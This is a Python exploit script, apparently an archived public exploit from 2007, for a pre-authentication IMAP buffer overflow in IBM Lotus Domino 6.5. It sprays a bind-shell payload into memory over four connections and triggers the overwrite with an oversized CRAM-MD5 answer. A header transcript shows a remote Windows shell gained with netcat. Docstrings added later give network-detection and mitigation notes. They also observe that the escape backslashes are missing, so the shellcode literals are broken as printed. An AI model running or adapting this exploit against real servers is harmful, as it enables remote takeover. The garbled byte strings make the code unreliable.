
# Title : IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Published : 2007-03-31
# Author : muts


#!/usr/bin/python
#
# IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit
# Tested on windows 2003 server SP0. 
# Coded by Mati Aharoni
# muts@offensive-security.com
# http://www.offensive-security.com
# Notes:
# * Not for the faint of heart.
# * Iris, I love you
# Skeleton exploit shamelessly ripped off Winny Thomas
#
# bt ~ # ./domino 192.168.0.38
# [*] IBM Lotus Domino Server 6.5 Remote Exploit
# [*] muts {-at-} offensive-security.com
#
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# [*] Sending bindshell *somewhere* into memory
# * OK Domino IMAP4 Server Release 6.5 ready Sat, 31 Mar 2007 01:45:32 -0800
#
# + PDAwMzU5QjhGLjg4MjU3MkFGLjAwMDAwQkMwLjAwMDAwMDA4QFRFU1QuQ09NPg==
#
# [*] Triggering overwrite, ph33r.
# [*] You may need to wait up to 2 minutes
# [*] for egghunter to find da shell.
# bt ~ # date
# Sat Mar 31 11:47:07 GMT 2007
# bt ~ # nc -v 192.168.0.38 4444
# 192.168.0.38: inverse host lookup failed: Unknown host
# (UNKNOWN) [192.168.0.38] 4444 (krb524) open
# Microsoft Windows [Version 5.2.3790]
# (C) Copyright 1985-2003 Microsoft Corp.
#
#C:LotusDomino>


import sys
import md5
import struct
import base64
import socket

def sendbind(target):
	"""Send one padded, pre-authentication IMAP command to *target* on port 143.

	The command is ``a001 admin`` followed by a block of padding and the
	bind-shell payload declared below (its own comment says it listens on
	port 4444).  The function reads the banner, sends the command, reads one
	reply and closes the socket; nothing in the replies is parsed.  The
	``__main__`` block calls this four times before ``ExploitLotus``.

	Defender notes: ``admin`` is not a standard IMAP command, and no legitimate
	client sends a multi-hundred-byte argument before authenticating, so this
	exchange (repeated four times from one source) is a clear network
	signature.  On the host side, the payload's comment names the listener port
	that would appear if the payload ever ran.

	NOTE(review): as printed in this copy the escape sequences and the line
	ending carry no backslashes, so the literals are plain ASCII text as
	written; the comments describe the intended payload.
	"""
	bindshell ="x90"* 400  # Metasploit bind shell port 4444
	bindshell +="x54x30x30x57x54x30x30x57"  # 8-byte tag; the same bytes recur in ExploitLotus's payload
	# Encoded shell payload proper (see the "Metasploit bind shell" note above).
	bindshell +=("xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"
	"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"
	"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"
	"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"
	"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx36x4bx4e"
 	"x4fx44x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x56x4bx58"
	"x4ex56x46x32x46x32x4bx38x45x44x4ex43x4bx58x4ex47"
	"x45x50x4ax57x41x50x4fx4ex4bx38x4fx34x4ax41x4bx58"
	"x4fx55x42x52x41x30x4bx4ex43x4ex42x53x49x54x4bx38"
	"x46x53x4bx58x41x30x50x4ex41x33x42x4cx49x39x4ex4a"
	"x46x58x42x4cx46x57x47x30x41x4cx4cx4cx4dx50x41x30"
	"x44x4cx4bx4ex46x4fx4bx33x46x55x46x42x4ax42x45x57"
	"x43x4ex4bx58x4fx55x46x52x41x50x4bx4ex48x36x4bx58"
	"x4ex50x4bx34x4bx48x4fx55x4ex41x41x30x4bx4ex43x30"
	"x4ex52x4bx48x49x38x4ex36x46x42x4ex41x41x56x43x4c"
	"x41x43x42x4cx46x46x4bx48x42x54x42x33x4bx58x42x44"
	"x4ex50x4bx38x42x47x4ex41x4dx4ax4bx48x42x54x4ax50"
	"x50x35x4ax46x50x58x50x44x50x50x4ex4ex42x35x4fx4f"
	"x48x4dx41x53x4bx4dx48x36x43x55x48x56x4ax36x43x33"
	"x44x33x4ax56x47x47x43x47x44x33x4fx55x46x55x4fx4f"
	"x42x4dx4ax56x4bx4cx4dx4ex4ex4fx4bx53x42x45x4fx4f"
	"x48x4dx4fx35x49x48x45x4ex48x56x41x48x4dx4ex4ax50"
	"x44x30x45x55x4cx46x44x50x4fx4fx42x4dx4ax36x49x4d"
	"x49x50x45x4fx4dx4ax47x55x4fx4fx48x4dx43x45x43x45"
	"x43x55x43x55x43x45x43x34x43x45x43x34x43x35x4fx4f"
	"x42x4dx48x56x4ax56x41x41x4ex35x48x36x43x35x49x38"
	"x41x4ex45x49x4ax46x46x4ax4cx51x42x57x47x4cx47x55"
	"x4fx4fx48x4dx4cx36x42x31x41x45x45x35x4fx4fx42x4d"
	"x4ax36x46x4ax4dx4ax50x42x49x4ex47x55x4fx4fx48x4d"
	"x43x35x45x35x4fx4fx42x4dx4ax36x45x4ex49x44x48x38"
	"x49x54x47x55x4fx4fx48x4dx42x55x46x35x46x45x45x35"
	"x4fx4fx42x4dx43x49x4ax56x47x4ex49x37x48x4cx49x37"
	"x47x45x4fx4fx48x4dx45x55x4fx4fx42x4dx48x36x4cx56"
	"x46x46x48x36x4ax46x43x56x4dx56x49x38x45x4ex4cx56"
	"x42x55x49x55x49x52x4ex4cx49x48x47x4ex4cx36x46x54"
	"x49x58x44x4ex41x43x42x4cx43x4fx4cx4ax50x4fx44x54"
	"x4dx32x50x4fx44x54x4ex52x43x49x4dx58x4cx47x4ax53"
	"x4bx4ax4bx4ax4bx4ax4ax46x44x57x50x4fx43x4bx48x51"
	"x4fx4fx45x57x46x54x4fx4fx48x4dx4bx45x47x35x44x35"
	"x41x35x41x55x41x35x4cx46x41x50x41x35x41x45x45x35"
	"x41x45x4fx4fx42x4dx4ax56x4dx4ax49x4dx45x30x50x4c"
	"x43x35x4fx4fx48x4dx4cx56x4fx4fx4fx4fx47x33x4fx4f"
	"x42x4dx4bx58x47x45x4ex4fx43x38x46x4cx46x36x4fx4f"
	"x48x4dx44x55x4fx4fx42x4dx4ax36x4fx4ex50x4cx42x4e"
	"x42x36x43x55x4fx4fx48x4dx4fx4fx42x4dx5a")

	# Plain IMAP client handshake on port 143: the banner is read and discarded.
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, 143))
	response = sock.recv(1024)
	# Tagged "admin" command (not part of the IMAP command set) carrying the padded payload.
	bind = 'a001 admin ' + bindshell +'rn'
	print "[*] Sending bindshell *somewhere* into memory"
	sock.send(bind)
	# One reply is read only to let the server finish; its content is ignored.
	response = sock.recv(1024)
	sock.close()

def ExploitLotus(target):
	"""Trigger the overwrite through the IMAP AUTHENTICATE CRAM-MD5 exchange.

	Flow as written: connect to *target* on port 143, print the banner, send
	``a001 authenticate cram-md5``, print the server's challenge, then answer
	with a base64-encoded string that is a padded payload plus a raw MD5 digest
	rather than the ``user hex-digest`` pair CRAM-MD5 expects.  The server's
	reply to that answer is never read; the function prints the two status
	lines seen in the header transcript and returns.

	Defender notes: the answer is several hundred bytes before base64 encoding,
	far larger than any legitimate CRAM-MD5 response, and it follows the four
	``sendbind`` connections from the same source; that sequence is the thing
	to alert on in IMAP traffic.  Mitigation is the vendor fix for this Domino
	release, and not running the IMAP task where it is not needed removes the
	exposure entirely.
	"""
	sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	sock.connect((target, 143))
	response = sock.recv(1024)
	print response
	# Start the challenge/response mechanism; the challenge is printed but not used.
	auth = 'a001 authenticate cram-md5rn'
	sock.send(auth)
	response = sock.recv(1024)
	print response
	# response[2:0] is an empty slice, so the digest below is that of no data;
	# the server challenge never enters the hash.
	m = md5.new()
	m.update(response[2:0])
	digest = m.digest()
	# Padding, a short stub (the header calls it the egghunter; it contains the
	# same x54x30x30x57 tag bytes that sendbind sends), then 210 filler bytes.
	payload = "x90" * 12 + "x33xd2x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74xefxb8x54x30x30x57x8bxfaxafx75xeaxafx75xe7xffxe7" + 'A' * 210

	# 0x774b4c6a CALL [EAX +4]

	# "jLKw" is the little-endian byte form of the address named in the comment above.
	payload += "jLKw"
	# Final stub appended after the address bytes.
	payload += "x90x90x90x83xE8x52x83xE8x52x83xE8x52xFFxE0"
	# CRAM-MD5 responses are "user <hex digest>"; this sends the payload and the raw digest bytes instead.
	login = payload + ' ' + digest
	login = base64.encodestring(login) + 'rn'
	print "[*] Triggering overwrite, ph33r."
	sock.send(login)
	sock.close()
	print "[*] You may need to wait up to 2 minutes"
	print "[*] for egghunter to find da shell."

if __name__=="__main__":
	# Entry point: the single positional argument is the IMAP server to connect to.
	try:
		target = sys.argv[1]
	except IndexError:
		# No host given: print the banner and usage, then exit non-zero.
		print '[*] IBM Lotus Domino Server 6.5 Remote Exploit n[*] muts {-at-} offensive-security.comrn'
		print '[*] Usage: %s <imap server>n' % sys.argv[0]
		
		sys.exit(-1)
	
	print '[*] IBM Lotus Domino Server 6.5 Remote Exploit n[*] muts {-at-} offensive-security.comrn'
	# Four separate padded pre-auth connections, then the CRAM-MD5 exchange that
	# triggers the overwrite; the header transcript shows this same sequence.
	sendbind(target)
	sendbind(target)
	sendbind(target)
	sendbind(target)
	ExploitLotus(target)
